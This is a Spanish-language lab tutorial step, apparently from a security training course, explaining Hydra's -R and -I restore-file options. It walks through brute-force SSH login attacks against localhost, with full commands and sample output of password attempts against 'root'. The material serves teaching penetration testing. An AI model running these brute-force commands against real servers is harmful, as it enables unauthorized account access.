Usar -I para Ignorar Archivos de Restauración
En este paso, usarás la opción -I para ignorar los archivos de restauración existentes e iniciar un ataque nuevo. Esto es útil cuando deseas reiniciar un ataque desde el principio, independientemente de los datos de la sesión anterior.
Primero, intentemos usar -R cuando no existe un archivo de restauración para ver el error:
rm -f hydra.restore
hydra -V -R -L users.txt -P passwords.txt localhost ssh
Deberías ver un mensaje de error:
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Por favor, no lo use en organizaciones militares o de servicios secretos, o para fines ilegales (esto no es vinculante, estas *** ignoran las leyes y la ética de todos modos).
[INFORMACIÓN] leyendo el archivo de restauración ./hydra.restore
[ERROR] archivo de restauración (./hydra.restore) no encontrado - No existe el archivo o el directorio
Ahora, creemos un archivo de restauración de nuevo interrumpiendo un ataque:
hydra -V -L users.txt -P passwords.txt -t 1 -W 2 localhost ssh
Interrumpe con Ctrl+C después de algunos intentos para crear el archivo de restauración.
Ahora, ejecuta el siguiente comando para ignorar el archivo de restauración:
hydra -V -I -L users.txt -P passwords.txt localhost ssh
Este comando incluye la opción -I:
-I: Indica a Hydra que ignore un archivo de restauración existente y no cree uno nuevo.
Observa la salida. Deberías ver que Hydra comienza desde el principio, ignorando cualquier archivo de restauración existente:
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Por favor, no lo use en organizaciones militares o de servicios secretos, o para fines ilegales (esto no es vinculante, estas *** ignoran las leyes y la ética de todos modos).
Hydra (https://github.com/vanhauser-thc/thc-hydra) comenzando a las 2025-05-30 10:10:00
[ADVERTENCIA] Muchas configuraciones de SSH limitan la cantidad de tareas paralelas, se recomienda reducir las tareas: use -t 4
[DATOS] máximo 3 tareas por 1 servidor, en general 3 tareas, 11 intentos de inicio de sesión (l:1/p:11), ~4 intentos por tarea
[DATOS] atacando ssh://localhost:22/
[INTENTO] objetivo 127.0.0.1 - inicio de sesión "root" - contraseña "password" - 1 de 11 [hijo 0] (0/0)
[INTENTO] objetivo 127.0.0.1 - inicio de sesión "root" - contraseña "123456" - 2 de 11 [hijo 0] (0/0)
...
Observa que el ataque comienza desde la primera contraseña ("password") independientemente del archivo de restauración existente.